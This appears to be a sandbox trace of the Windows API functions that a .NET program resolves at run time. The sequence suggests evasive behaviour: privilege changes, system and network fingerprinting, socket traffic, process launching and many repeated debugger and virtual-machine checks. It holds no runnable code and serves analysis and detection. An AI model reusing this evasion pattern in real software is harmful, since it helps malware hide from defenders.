DynamicLoader: mscoree.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: mscoreei.dll/RegisterShimImplCallback
DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
DynamicLoader: mscoreei.dll/SetShellShimInstance
DynamicLoader: mscoreei.dll/OnShimDllMainCalled
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx_RetAddr
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx
DynamicLoader: SHLWAPI.dll/UrlIsW
DynamicLoader: kernel32.dll/GetCurrentPackageId
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: msvcrt.dll/_set_error_mode
DynamicLoader: msvcrt.dll/?set_terminate@@YAP6AXXZP6AXXZ@Z
DynamicLoader: msvcrt.dll/_get_terminate
DynamicLoader: mscoree.dll/GetProcessExecutableHeap
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
DynamicLoader: mscorwks.dll/SetLoadedByMscoree
DynamicLoader: mscorwks.dll/DllGetClassObjectInternal
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: ADVAPI32.dll/RegisterTraceGuidsW
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: ADVAPI32.dll/GetTraceLoggerHandle
DynamicLoader: ADVAPI32.dll/GetTraceEnableLevel
DynamicLoader: ADVAPI32.dll/GetTraceEnableFlags
DynamicLoader: ADVAPI32.dll/TraceEvent
DynamicLoader: mscoree.dll/IEE
DynamicLoader: mscoreei.dll/IEE_RetAddr
DynamicLoader: mscoreei.dll/IEE
DynamicLoader: mscorwks.dll/IEE
DynamicLoader: mscoree.dll/GetStartupFlags
DynamicLoader: mscoreei.dll/GetStartupFlags_RetAddr
DynamicLoader: mscoreei.dll/GetStartupFlags
DynamicLoader: mscoree.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetHostConfigurationFile_RetAddr
DynamicLoader: mscoreei.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetCORVersion_RetAddr
DynamicLoader: mscoreei.dll/GetCORVersion
DynamicLoader: mscoree.dll/GetCORSystemDirectory
DynamicLoader: mscoreei.dll/GetCORSystemDirectory_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream
DynamicLoader: ntdll.dll/RtlUnwind
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: kernel32.dll/SetThreadStackGuarantee
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/AddVectoredContinueHandler
DynamicLoader: kernel32.dll/RemoveVectoredContinueHandler
DynamicLoader: ADVAPI32.dll/ConvertSidToStringSidW
DynamicLoader: shell32.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/FlushProcessWriteBuffers
DynamicLoader: kernel32.dll/GetWriteWatch
DynamicLoader: kernel32.dll/ResetWriteWatch
DynamicLoader: kernel32.dll/CreateMemoryResourceNotification
DynamicLoader: kernel32.dll/QueryMemoryResourceNotification
DynamicLoader: mscoree.dll/_CorExeMain
DynamicLoader: mscoree.dll/_CorImageUnloading
DynamicLoader: mscoree.dll/_CorValidateImage
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoGetContextToken
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetUserDefaultUILanguage
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetFullPathName
DynamicLoader: kernel32.dll/GetFullPathNameW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetFileAttributesEx
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: version.dll/GetFileVersionInfoSize
DynamicLoader: version.dll/GetFileVersionInfoSizeW
DynamicLoader: version.dll/GetFileVersionInfo
DynamicLoader: version.dll/GetFileVersionInfoW
DynamicLoader: version.dll/VerQueryValue
DynamicLoader: version.dll/VerQueryValueW
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: mscoree.dll/ND_RI2
DynamicLoader: mscoreei.dll/ND_RI2_RetAddr
DynamicLoader: mscoreei.dll/ND_RI2
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrcpy
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: version.dll/VerLanguageName
DynamicLoader: version.dll/VerLanguageNameW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcessIdW
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValue
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivilegesW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/OpenProcessW
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: PSAPI.DLL/EnumProcessModulesW
DynamicLoader: PSAPI.DLL/GetModuleInformation
DynamicLoader: PSAPI.DLL/GetModuleInformationW
DynamicLoader: PSAPI.DLL/GetModuleBaseName
DynamicLoader: PSAPI.DLL/GetModuleBaseNameW
DynamicLoader: PSAPI.DLL/GetModuleFileNameEx
DynamicLoader: PSAPI.DLL/GetModuleFileNameExW
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/GetExitCodeProcessW
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtQuerySystemInformationW
DynamicLoader: USER32.dll/EnumWindows
DynamicLoader: USER32.dll/EnumWindowsW
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: USER32.dll/GetWindowThreadProcessIdW
DynamicLoader: USER32.dll/GetWindow
DynamicLoader: USER32.dll/IsWindowVisible
DynamicLoader: USER32.dll/IsWindowVisibleW
DynamicLoader: kernel32.dll/WerSetFlags
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetUserDefaultLocaleName
DynamicLoader: kernel32.dll/GetUserDefaultLocaleNameW
DynamicLoader: kernel32.dll/GetEnvironmentVariable
DynamicLoader: kernel32.dll/GetEnvironmentVariableW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
DynamicLoader: ADVAPI32.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/CryptCreateHash
DynamicLoader: ADVAPI32.dll/CryptDestroyHash
DynamicLoader: ADVAPI32.dll/CryptHashData
DynamicLoader: ADVAPI32.dll/CryptGetHashParam
DynamicLoader: ADVAPI32.dll/CryptImportKey
DynamicLoader: ADVAPI32.dll/CryptExportKey
DynamicLoader: ADVAPI32.dll/CryptGenKey
DynamicLoader: ADVAPI32.dll/CryptGetKeyParam
DynamicLoader: ADVAPI32.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptVerifySignatureA
DynamicLoader: ADVAPI32.dll/CryptSignHashA
DynamicLoader: ADVAPI32.dll/CryptGetProvParam
DynamicLoader: ADVAPI32.dll/CryptGetUserKey
DynamicLoader: ADVAPI32.dll/CryptEnumProvidersA
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: mscoreei.dll/_CorDllMain_RetAddr
DynamicLoader: mscoreei.dll/_CorDllMain
DynamicLoader: mscoree.dll/GetTokenForVTableEntry
DynamicLoader: mscoree.dll/SetTargetForVTableEntry
DynamicLoader: mscoree.dll/GetTargetForVTableEntry
DynamicLoader: mscoreei.dll/LoadLibraryShim_RetAddr
DynamicLoader: mscoreei.dll/LoadLibraryShim
DynamicLoader: culture.dll/ConvertLangIdToCultureName
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfo
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfoW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/GetCurrentProcessW
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetTokenInformationW
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/LocalAllocW
DynamicLoader: mscoree.dll/ND_RI4
DynamicLoader: mscoreei.dll/ND_RI4_RetAddr
DynamicLoader: mscoreei.dll/ND_RI4
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/DuplicateTokenExW
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: ADVAPI32.dll/CheckTokenMembershipW
DynamicLoader: kernel32.dll/GetConsoleTitle
DynamicLoader: kernel32.dll/GetConsoleTitleW
DynamicLoader: kernel32.dll/SetConsoleTitle
DynamicLoader: kernel32.dll/SetConsoleTitleW
DynamicLoader: kernel32.dll/SetConsoleCtrlHandler
DynamicLoader: kernel32.dll/SetConsoleCtrlHandlerW
DynamicLoader: kernel32.dll/CreateEvent
DynamicLoader: kernel32.dll/CreateEventW
DynamicLoader: ntdll.dll/WinSqmIsOptedIn
DynamicLoader: kernel32.dll/ExpandEnvironmentStrings
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: shfolder.dll/SHGetFolderPath
DynamicLoader: shfolder.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/SetEnvironmentVariable
DynamicLoader: kernel32.dll/SetEnvironmentVariableW
DynamicLoader: kernel32.dll/GetACP
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetFileType
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetSystemInfo
DynamicLoader: kernel32.dll/VirtualQuery
DynamicLoader: kernel32.dll/SwitchToThread
DynamicLoader: kernel32.dll/GlobalMemoryStatusEx
DynamicLoader: ADVAPI32.dll/RegQueryInfoKey
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumValue
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegEnumKeyEx
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: secur32.dll/GetUserNameEx
DynamicLoader: secur32.dll/GetUserNameExW
DynamicLoader: ADVAPI32.dll/GetUserName
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: ADVAPI32.dll/RegisterEventSource
DynamicLoader: ADVAPI32.dll/RegisterEventSourceW
DynamicLoader: ADVAPI32.dll/DeregisterEventSource
DynamicLoader: ADVAPI32.dll/ReportEvent
DynamicLoader: ADVAPI32.dll/ReportEventW
DynamicLoader: kernel32.dll/GetLogicalDrives
DynamicLoader: kernel32.dll/GetDriveType
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetVolumeInformation
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: kernel32.dll/GetCurrentDirectory
DynamicLoader: kernel32.dll/GetCurrentDirectoryW
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: mscorjit.dll/getJit
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetStdHandle
DynamicLoader: kernel32.dll/GetStdHandleW
DynamicLoader: kernel32.dll/GetConsoleMode
DynamicLoader: kernel32.dll/GetConsoleModeW
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/SetThreadUILanguageW
DynamicLoader: kernel32.dll/GetModuleFileName
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesEx
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: rasapi32.dll/RasEnumConnections
DynamicLoader: rasapi32.dll/RasEnumConnectionsW
DynamicLoader: rtutils.dll/TraceRegisterExA
DynamicLoader: rtutils.dll/TracePrintfExA
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/QueryServiceStatus
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: WS2_32.dll/WSAStartup
DynamicLoader: WS2_32.dll/WSASocket
DynamicLoader: WS2_32.dll/WSASocketW
DynamicLoader: WS2_32.dll/setsockopt
DynamicLoader: WS2_32.dll/WSAEventSelect
DynamicLoader: WS2_32.dll/ioctlsocket
DynamicLoader: WS2_32.dll/closesocket
DynamicLoader: kernel32.dll/GetComputerName
DynamicLoader: kernel32.dll/GetComputerNameW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/ConvertStringSecurityDescriptorToSecurityDescriptor
DynamicLoader: ADVAPI32.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/CreateFileMapping
DynamicLoader: kernel32.dll/CreateFileMappingW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/MapViewOfFile
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/VirtualQuery
DynamicLoader: ADVAPI32.dll/CreateWellKnownSid
DynamicLoader: ADVAPI32.dll/CreateWellKnownSidW
DynamicLoader: kernel32.dll/CreateMutex
DynamicLoader: kernel32.dll/CreateMutexW
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/OpenMutex
DynamicLoader: kernel32.dll/OpenMutexW
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/OpenProcessW
DynamicLoader: kernel32.dll/GetProcessTimes
DynamicLoader: kernel32.dll/GetProcessTimesW
DynamicLoader: WS2_32.dll/ioctlsocket
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: kernel32.dll/FormatMessage
DynamicLoader: kernel32.dll/FormatMessageW
DynamicLoader: WS2_32.dll/WSAEventSelect
DynamicLoader: rasapi32.dll/RasConnectionNotification
DynamicLoader: rasapi32.dll/RasConnectionNotificationW
DynamicLoader: ADVAPI32.dll/RegOpenCurrentUser
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: sechost.dll/NotifyServiceStatusChangeA
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegNotifyChangeKeyValue
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: winhttp.dll/WinHttpGetIEProxyConfigForCurrentUser
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: NSI.dll/NsiAllocateAndGetTable
DynamicLoader: CFGMGR32.dll/CM_Open_Class_Key_ExW
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: IPHLPAPI.DLL/GetIfEntry2
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: NSI.dll/NsiFreeTable
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: kernel32.dll/ResetEvent
DynamicLoader: winhttp.dll/WinHttpDetectAutoProxyConfigUrl
DynamicLoader: kernel32.dll/GlobalFree
DynamicLoader: WS2_32.dll/getaddrinfo
DynamicLoader: WS2_32.dll/
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: IPHLPAPI.DLL/GetNetworkParams
DynamicLoader: DNSAPI.dll/DnsQueryConfig
DynamicLoader: IPHLPAPI.DLL/GetAdaptersAddresses
DynamicLoader: IPHLPAPI.DLL/GetIpInterfaceEntry
DynamicLoader: IPHLPAPI.DLL/GetBestInterfaceEx
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: IPHLPAPI.DLL/GetAdaptersAddresses
DynamicLoader: WS2_32.dll/inet_addr
DynamicLoader: WS2_32.dll/getaddrinfo
DynamicLoader: WS2_32.dll/freeaddrinfo
DynamicLoader: IPHLPAPI.DLL/GetAdaptersAddresses
DynamicLoader: WS2_32.dll/WSAConnect
DynamicLoader: WS2_32.dll/send
DynamicLoader: WS2_32.dll/setsockopt
DynamicLoader: WS2_32.dll/recv
DynamicLoader: WS2_32.dll/select
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/RtlMoveMemory
DynamicLoader: kernel32.dll/RtlMoveMemoryW
DynamicLoader: shell32.dll/ShellExecuteEx
DynamicLoader: shell32.dll/ShellExecuteExW
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: mscoree.dll/CorExitProcess
DynamicLoader: mscoreei.dll/CorExitProcess_RetAddr
DynamicLoader: mscoreei.dll/CorExitProcess
DynamicLoader: mscorwks.dll/CorExitProcess
DynamicLoader: mscorwks.dll/_CorDllMain
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: kernel32.dll/AddRefActCtx
DynamicLoader: kernel32.dll/ReleaseActCtx
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: kernel32.dll/GetCurrentActCtx
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: ADVAPI32.dll/EventRegister
DynamicLoader: ADVAPI32.dll/EventUnregister
DynamicLoader: ADVAPI32.dll/EventEnabled
DynamicLoader: ADVAPI32.dll/EventWrite
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: OSPPOBJS.DLL/SppPluginInitialize
DynamicLoader: OSPPOBJS.DLL/SppPluginShutdown
DynamicLoader: OSPPOBJS.DLL/SppPluginCreateInstance
DynamicLoader: OSPPOBJS.DLL/SppPluginCanUnloadNow
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: SspiCli.dll/GetUserNameExW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ADVAPI32.dll/NotifyServiceStatusChangeW
DynamicLoader: SETUPAPI.dll/SetupDiGetClassDevsW
DynamicLoader: SETUPAPI.dll/SetupDiEnumDeviceInfo
DynamicLoader: SETUPAPI.dll/SetupDiGetDeviceRegistryPropertyW
DynamicLoader: SETUPAPI.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: WINTRUST.dll/WinVerifyTrust
DynamicLoader: SETUPAPI.dll/SetupDiEnumDeviceInterfaces
DynamicLoader: SETUPAPI.dll/SetupDiGetDeviceInterfaceDetailW
DynamicLoader: kernel32.dll/GetSystemFirmwareTable
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: ntdll.dll/ZwQueryInformationProcess
